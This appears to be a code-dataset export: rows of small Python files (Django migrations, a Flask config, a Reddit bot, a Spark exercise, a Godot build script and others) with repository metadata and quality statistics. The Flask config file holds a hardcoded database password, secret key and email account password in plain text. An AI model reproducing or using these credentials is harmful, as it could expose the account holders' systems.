hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
e6ddfeb2d231878165ecef38a814ab51e23d6978
412
py
Python
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Wed Dec 25 15:46:32 2019 @author: tadahaya """ from .binom import BT from .connect import Connect from .fet import FET from .gsea import GSEA from .ssgsea import ssGSEA __copyright__ = 'Copyright (C) 2020 MIZUNO Tadahaya' __version__ = '1.0.3' __license__ = 'MIT' __author__ = 'MIZUNO Tadahaya' __author_email__ = 'tadahaya@gmail.com'
22.888889
56
0.662621
54
412
4.666667
0.648148
0.111111
0
0
0
0
0
0
0
0
0
0.062893
0.228155
412
18
57
22.888889
0.72956
0.186893
0
0
0
0
0.241158
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6e002827d5c227b7c36fcd9b7c86eda019324e4
449
py
Python
server/processes/migrations/0132_auto_20201108_0540.py
CloudReactor/task_manager
464ca74371064fabb9a21b1f5bacba30360932ab
[ "Fair" ]
null
null
null
server/processes/migrations/0132_auto_20201108_0540.py
CloudReactor/task_manager
464ca74371064fabb9a21b1f5bacba30360932ab
[ "Fair" ]
6
2021-11-01T01:35:40.000Z
2022-02-11T03:33:06.000Z
server/processes/migrations/0132_auto_20201108_0540.py
CloudReactor/task_manager
464ca74371064fabb9a21b1f5bacba30360932ab
[ "Fair" ]
null
null
null
# Generated by Django 2.2.14 on 2020-11-08 05:40 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('processes', '0131_auto_20201107_2316'), ] operations = [ migrations.RunSQL( "UPDATE processes_workflow SET run_environment_id = scheduling_run_environment_id WHERE run_environment_id IS NULL;", reverse_sql='', ), ]
24.944444
134
0.623608
49
449
5.469388
0.755102
0.156716
0.179104
0
0
0
0
0
0
0
0
0.100629
0.291759
449
17
135
26.411765
0.742138
0.10245
0
0
1
0
0.380208
0.135417
0
0
0
0
0
1
0
false
0
0.090909
0
0.363636
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6e370a3613328a0a9c46c0e262a69e05fcae601
355
py
Python
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
748
2018-05-02T17:12:53.000Z
2022-03-26T04:44:44.000Z
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
352
2018-05-02T19:05:59.000Z
2022-02-25T16:54:27.000Z
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
193
2018-05-02T17:14:56.000Z
2022-02-24T21:10:56.000Z
#!/usr/bin/env python3 import importlib import os # automatically import any Python files in the models/ directory for file in sorted(os.listdir(os.path.dirname(__file__))): if file.endswith(".py") and not file.startswith("_"): model_name = file[: file.find(".py")] importlib.import_module("pytorch_translate.models." + model_name)
29.583333
73
0.712676
49
355
4.979592
0.673469
0.122951
0
0
0
0
0
0
0
0
0
0.003333
0.15493
355
11
74
32.272727
0.81
0.23662
0
0
0
0
0.118959
0.092937
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6e3cdee410d18c73bf42cae95012d7ea773e4ae
808
py
Python
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
2
2020-05-08T15:58:44.000Z
2020-05-09T19:36:34.000Z
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
null
null
null
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- __author__ = '带土' SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:mapei123@127.0.0.1:3306/awesome' SECRET_KEY = '\x88D\xf09\x91\x07\x98\x89\x87\x96\xa0A\xc68\xf9\xecJ:U\x17\xc5V\xbe\x8b\xef\xd7\xd8\xd3\xe6\x98*4' # Email 配置 MAIL_SERVER = 'smtp.exmail.qq.com' MAIL_PORT = 465 MAIL_USE_SSL = True MAIL_USE_TSL = False MAIL_USERNAME = 'hello@yushu.im' MAIL_PASSWORD = 'Bmwzy1314520' MAIL_SUBJECT_PREFIX = '[鱼书]' MAIL_SENDER = '鱼书 <hello@yushu.im>' # 开启数据库查询性能测试 SQLALCHEMY_RECORD_QUERIES = True # 性能测试的阀值 DATABASE_QUERY_TIMEOUT = 0.5 SQLALCHEMY_TRACK_MODIFICATIONS = True WTF_CSRF_CHECK_DEFAULT = False SQLALCHEMY_ECHO = True from datetime import timedelta REMEMBER_COOKIE_DURATION = timedelta(days=30) PROXY_API = 'http://ip.yushu.im/get' # PERMANENT_SESSION_LIFETIME = 3600
22.444444
113
0.762376
125
808
4.664
0.792
0.036021
0.041166
0
0
0
0
0
0
0
0
0.087258
0.106436
808
35
114
23.085714
0.720222
0.10396
0
0
0
0.052632
0.335655
0.208914
0
0
0
0
0
1
0
false
0.052632
0.052632
0
0.052632
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e6e519c34806df836f150fb2649703603da92026
1,580
py
Python
src/users/migrations/0014_auto_20200801_1008.py
aliharby12/Simple-vezeeta-project
feb6df8b354ac284edc645059bea17021169dcfa
[ "MIT" ]
null
null
null
src/users/migrations/0014_auto_20200801_1008.py
aliharby12/Simple-vezeeta-project
feb6df8b354ac284edc645059bea17021169dcfa
[ "MIT" ]
5
2021-03-19T12:06:16.000Z
2022-02-10T11:44:27.000Z
src/users/migrations/0014_auto_20200801_1008.py
aliharby12/Simple-vezeeta-project
feb6df8b354ac284edc645059bea17021169dcfa
[ "MIT" ]
null
null
null
# Generated by Django 2.2 on 2020-08-01 08:08 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('users', '0013_auto_20200731_1810'), ] operations = [ migrations.AlterField( model_name='profile', name='Specialist_doctor', field=models.CharField(choices=[('جراحه اطفال', 'جراحه اططفال'), ('تخسيس', 'تخسيس'), ('عظام', 'عظام'), ('جراحه عامه', 'جراحه عامه'), ('اطفال', 'اطفال'), ('اورام', 'اورام'), ('مخ واعصاب', 'مخ واعصاب'), ('انف واذن', 'انف واذن'), ('امراض دم', 'امراض دم'), ('باطنة', 'باطنه'), ('اسنان', 'اسنان'), ('جراحه تجميل', 'جراحه تجميل'), ('حميات', 'حميات'), ('نسا وتوليد', 'نسا وتوليد')], default='باطنه', max_length=255, verbose_name='التخصص'), ), migrations.CreateModel( name='Comment', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=255, verbose_name='اسم صاحب التعليق')), ('email', models.EmailField(max_length=254, verbose_name='البريد الالكتروني')), ('body', models.TextField(verbose_name='محتوى التعليق')), ('comment_date', models.DateTimeField(auto_now_add=True)), ('active', models.BooleanField(default=False)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='users.Profile')), ], ), ]
49.375
444
0.599367
171
1,580
5.421053
0.54386
0.059331
0.030205
0.047465
0.049622
0
0
0
0
0
0
0.031733
0.222152
1,580
31
445
50.967742
0.722539
0.027215
0
0.08
1
0
0.246906
0.014984
0
0
0
0
0
1
0
false
0
0.08
0
0.2
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6e54d8b26245cebf1276442b433cc49edf1fc78
762
py
Python
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
from typing import Any, List, Callable from fastapi import APIRouter, HTTPException, status, BackgroundTasks from app import schemas from app.core import docker_client import json from copy import deepcopy router = APIRouter() @router.get("/images", response_model=schemas.DockerImageRespond) def get_docker_image() -> Any: images_list = docker_client.images.list(all=True) return { 'images': [{'id': image.short_id, 'tags': image.tags} for image in images_list if image.tags] } @router.get("/volumes", response_model=schemas.DockerVolumeRespond) def get_docker_volume() -> Any: volumes_list = docker_client.volumes.list() return { 'volumes': [{'id': volume.short_id, 'name': volume.name} for volume in volumes_list] }
28.222222
99
0.732283
100
762
5.43
0.4
0.066298
0.073665
0
0
0
0
0
0
0
0
0
0.153543
762
26
100
29.307692
0.84186
0
0
0.105263
0
0
0.052493
0
0
0
0
0
0
1
0.105263
false
0
0.315789
0
0.526316
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6eadd6e5aefadc0d052f84f6f0acadbd4bc7e84
440
py
Python
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
""" Your module description """ """ this is my second py code for my second lecture """ #print ('hello world') # this is a single line commment # this is my second line comment #print(type("123.")) #print ("Hello World".upper()) #print("Hello World".lower()) #print("hello" + "world" + ".") #print(2**3) #my_str = "hello world" #print(my_str) #my_str = "Tom" #print(my_str) my_int = 2 my_float = 3.0 print(my_int + my_float)
12.941176
56
0.638636
70
440
3.9
0.428571
0.18315
0.21978
0.102564
0
0
0
0
0
0
0
0.022161
0.179545
440
34
57
12.941176
0.734072
0.656818
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6ecb90ea1c9f175831984d63548bf549ba7937d
335
py
Python
Auth/Constants/LoginOpCode.py
sundayz/idewave-core
5bdb88892173c9c3e8c85f431cf9b5dbd9f23941
[ "Apache-2.0" ]
null
null
null
Auth/Constants/LoginOpCode.py
sundayz/idewave-core
5bdb88892173c9c3e8c85f431cf9b5dbd9f23941
[ "Apache-2.0" ]
null
null
null
Auth/Constants/LoginOpCode.py
sundayz/idewave-core
5bdb88892173c9c3e8c85f431cf9b5dbd9f23941
[ "Apache-2.0" ]
null
null
null
from enum import Enum class LoginOpCode(Enum): ''' Opcodes during login process ''' LOGIN_CHALL = 0x00 LOGIN_PROOF = 0x01 RECON_CHALL = 0x02 # currently do not in use RECON_PROOF = 0x03 # currently do not in use REALMLIST = 0x10 class LoginResult(Enum): ''' Error codes ''' SUCCESS = 0x00
18.611111
49
0.641791
42
335
5.02381
0.642857
0.104265
0.132701
0.151659
0.180095
0
0
0
0
0
0
0.074689
0.280597
335
17
50
19.705882
0.80083
0.271642
0
0
0
0
0
0
0
0
0.104348
0
0
1
0
false
0
0.111111
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
e6ee7c4e821041f353c4df40b51b9e9fed815d11
325
py
Python
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
#!/usr/bin/python import praw reddit = praw.Reddit('mob-secondbot') subreddit = reddit.subreddit("learnpython") for submission in subreddit.hot(limit=5): print("Title: ", submission.title) print("Text: ", submission.selftext) print("Score: ", submission.score) print("---------------------------------\n")
25
48
0.618462
35
325
5.742857
0.628571
0.099502
0
0
0
0
0
0
0
0
0
0.003534
0.129231
325
12
49
27.083333
0.706714
0.049231
0
0
0
0
0.256494
0.113636
0
0
0
0
0
1
0
false
0
0.125
0
0.125
0.5
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e6ee864c778e3c7bd05d01ccaa072084d9d7a6f7
1,052
py
Python
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
from subprocess import Popen, PIPE, call name = "kazuate_liar.o" src = """ #include <iostream> #include <random> using namespace std; int main() { random_device rd; mt19937 mt(rd()); uniform_int_distribution<int> randfive(0, 4); uniform_int_distribution<int> randint(1, 100); int count = 0; int num = randint(mt); while (1) { int i; cout << "数を当ててみて "; cin >> i; if (i < 1 || i > 100) { cout << "不正な入力です。" << endl; continue; } count++; bool liar = randfive(mt) == 0; if (i == num) { cout << "正解です。おめでとう。 (" << count << " 回目)" << endl; break; } else if ((liar && i > num) || i < num) { cout << "もっと大きいよ。" << endl; } else { cout << "もっと小さいよ。" << endl; } } return 0; } """; proc = Popen(["g++", "-o", name, "-x", "c++", "-"], stdin = PIPE); proc.communicate(src.encode()); call(["./" + name]);
17.533333
66
0.439163
111
1,052
4.108108
0.522523
0.026316
0.096491
0.109649
0
0
0
0
0
0
0
0.029141
0.380228
1,052
59
67
17.830508
0.670245
0
0
0
0
0
0.834443
0.055186
0
0
0
0
0
1
0
false
0
0.021739
0
0.043478
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6f2fef589655b9bf1c7a2c668ca919bfd152a24
460
py
Python
Arrays/cyclic_rotation.py
Jeans212/codility-dev-training
9c5118c6433ea210d1485a6127712a92496e2bc2
[ "MIT" ]
null
null
null
Arrays/cyclic_rotation.py
Jeans212/codility-dev-training
9c5118c6433ea210d1485a6127712a92496e2bc2
[ "MIT" ]
null
null
null
Arrays/cyclic_rotation.py
Jeans212/codility-dev-training
9c5118c6433ea210d1485a6127712a92496e2bc2
[ "MIT" ]
null
null
null
# you can write to stdout for debugging purposes, e.g. # print("this is a debug message") ''' Rotate an array A to the right by a given number of steps K. Covert the array to a deque Apply the rotate() method the rotate the deque in positive K steps Convert the deque to array ''' from collections import deque def solution(A, K): # write your code in Python 3.6 deq_A = deque(A) deq_A.rotate(K) return list(deq_A)
23
70
0.669565
80
460
3.8125
0.5875
0.039344
0
0
0
0
0
0
0
0
0
0.005882
0.26087
460
19
71
24.210526
0.891176
0.652174
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.6
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
e6fab2043b0b6fa907bee5da86873ddbf2cfe3cf
1,432
py
Python
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
24
2016-10-14T16:54:01.000Z
2022-01-15T06:39:17.000Z
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
17
2016-12-30T14:35:53.000Z
2017-03-07T21:07:50.000Z
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
9
2017-08-04T12:00:16.000Z
2021-12-10T06:48:28.000Z
import os import sys def is_active(): return True def get_name(): return "Server" def can_build(): if (os.name!="posix"): return False return True # enabled def get_opts(): return [ ('use_llvm','Use llvm compiler','no'), ('force_32_bits','Force 32 bits binary','no') ] def get_flags(): return [ ('builtin_zlib', 'no'), ] def configure(env): env.Append(CPPPATH=['#platform/server']) if (env["use_llvm"]=="yes"): env["CC"]="clang" env["CXX"]="clang++" env["LD"]="clang++" if (env["colored"]=="yes"): if sys.stdout.isatty(): env.Append(CXXFLAGS=["-fcolor-diagnostics"]) is64=sys.maxsize > 2**32 if (env["bits"]=="default"): if (is64): env["bits"]="64" else: env["bits"]="32" #if (env["tools"]=="no"): # #no tools suffix # env['OBJSUFFIX'] = ".nt"+env['OBJSUFFIX'] # env['LIBSUFFIX'] = ".nt"+env['LIBSUFFIX'] if (env["target"]=="release"): env.Append(CCFLAGS=['-O2','-ffast-math','-fomit-frame-pointer']) elif (env["target"]=="release_debug"): env.Append(CCFLAGS=['-O2','-ffast-math','-DDEBUG_ENABLED']) elif (env["target"]=="debug"): env.Append(CCFLAGS=['-g2', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED']) env.Append(CPPFLAGS=['-DSERVER_ENABLED','-DUNIX_ENABLED']) env.Append(LIBS=['pthread','z']) #TODO detect linux/BSD! if (env["CXX"]=="clang++"): env.Append(CPPFLAGS=['-DTYPED_METHOD_BIND']) env["CC"]="clang" env["LD"]="clang++"
17.679012
81
0.609637
193
1,432
4.42487
0.435233
0.084309
0.056206
0.030445
0.063232
0.063232
0
0
0
0
0
0.014516
0.134078
1,432
80
82
17.9
0.674194
0.106844
0
0.173913
0
0
0.335697
0.017336
0
0
0
0.0125
0
1
0.130435
false
0
0.043478
0.086957
0.304348
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e6fc32c8a31669a37234337e3418a714af3c26bd
1,483
py
Python
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
null
null
null
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
null
null
null
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
1
2021-03-26T11:47:37.000Z
2021-03-26T11:47:37.000Z
import csv from pyspark.sql import SparkSession from pyspark.sql.types import IntegerType spark = SparkSession.builder.appName("Assignment4").getOrCreate() sc = spark.sparkContext # load data to dataframe path = 'fake_data.csv' df = spark.read.format('csv').option('header','true').load(path) # cast income as an integer df = df.withColumn('Income', df['Income'].cast(IntegerType())) # Question 1 print('*' * 30) print('\nQuestion 1\n') print(df.rdd.map(lambda x: (x[1], x[0])).groupByKey().mapValues(lambda vals: len(set(vals))).sortBy(lambda a: a[1], ascending = False).take(1)) print('\n\n') # Question 2 print('*' * 30) print('\nQuestion 2\n') print(df.rdd.filter(lambda v: v[1] == 'United States of America').map(lambda x: (x[1], x[4])).groupByKey().mapValues(lambda x: sum(x) / len(x)).collect()) print('\n\n') # Question 3 print('*' * 30) print('\nQuestion 3\n') print(df.rdd.filter(lambda v: v[4] > 100000).filter(lambda v: v[7] == 'FALSE').count()) print('\n\n') # Question 4 print('*' * 30) print('\nQuestion 4\n') print(df.rdd.filter(lambda v: v[1] == 'United States of America').sortBy(lambda x: x[4], ascending = False).map(lambda x: (x[3], x[6], x[4], x[5])).take(10)) print('\n\n') # Question 5 print('*' * 30) print('\nQuestion 5\n') print(df.rdd.groupBy(lambda x: x[5]).count()) print('\n\n') # Question 6 print('*' * 30) print('\nQuestion 6\n') print(df.rdd.filter(lambda v: v[5] == 'Writer').filter(lambda x: x[4] < 100000).count()) print('\n\n')
26.017544
157
0.652057
246
1,483
3.926829
0.296748
0.050725
0.074534
0.130435
0.217391
0.175983
0.149068
0.149068
0.097308
0.097308
0
0.043511
0.116655
1,483
56
158
26.482143
0.693893
0.076871
0
0.375
0
0
0.163476
0
0
0
0
0
0
1
0
false
0
0.09375
0
0.09375
0.75
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e6fc5742d6236482be2f3020d03479a9c33e3222
274
py
Python
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
52
2017-03-15T16:25:14.000Z
2022-03-01T16:50:14.000Z
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
239
2017-03-16T17:10:22.000Z
2022-03-06T07:24:24.000Z
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
8
2017-03-15T17:45:18.000Z
2022-01-26T14:51:03.000Z
import factory from django.contrib.auth import get_user_model class UserFactory(factory.DjangoModelFactory): class Meta: model = get_user_model() first_name = factory.Faker('name') last_name = factory.Faker('name') email = factory.Faker('email')
21.076923
46
0.715328
34
274
5.588235
0.529412
0.189474
0.126316
0.210526
0
0
0
0
0
0
0
0
0.182482
274
12
47
22.833333
0.848214
0
0
0
0
0
0.047445
0
0
0
0
0
0
1
0
false
0
0.25
0
0.875
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6fc7870ccb1bbdefca5d31e7c6358dd9b6c9578
482
py
Python
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
from dataclasses import dataclass, field from reamber.base.Hold import Hold, HoldTail from reamber.o2jam.O2JNoteMeta import O2JNoteMeta @dataclass class O2JHoldTail(HoldTail, O2JNoteMeta): pass @dataclass class O2JHold(Hold, O2JNoteMeta): """ Defines the O2Jam Bpm Object The O2Jam Bpm Object is stored in binary file .ojn """ _tail: O2JHoldTail = field(init=False) def _upcastTail(self, **kwargs) -> O2JHoldTail: return O2JHoldTail(**kwargs)
21.909091
54
0.73029
57
482
6.140351
0.578947
0.062857
0.062857
0.097143
0
0
0
0
0
0
0
0.030612
0.186722
482
21
55
22.952381
0.862245
0.165975
0
0.181818
0
0
0
0
0
0
0
0
0
1
0.090909
false
0.090909
0.272727
0.090909
0.727273
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc01bbc538287134d61e574ed4af064a81cfdf43
1,307
py
Python
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
2
2020-12-06T13:10:52.000Z
2021-07-06T06:50:10.000Z
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
null
null
null
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
1
2019-05-31T02:45:38.000Z
2019-05-31T02:45:38.000Z
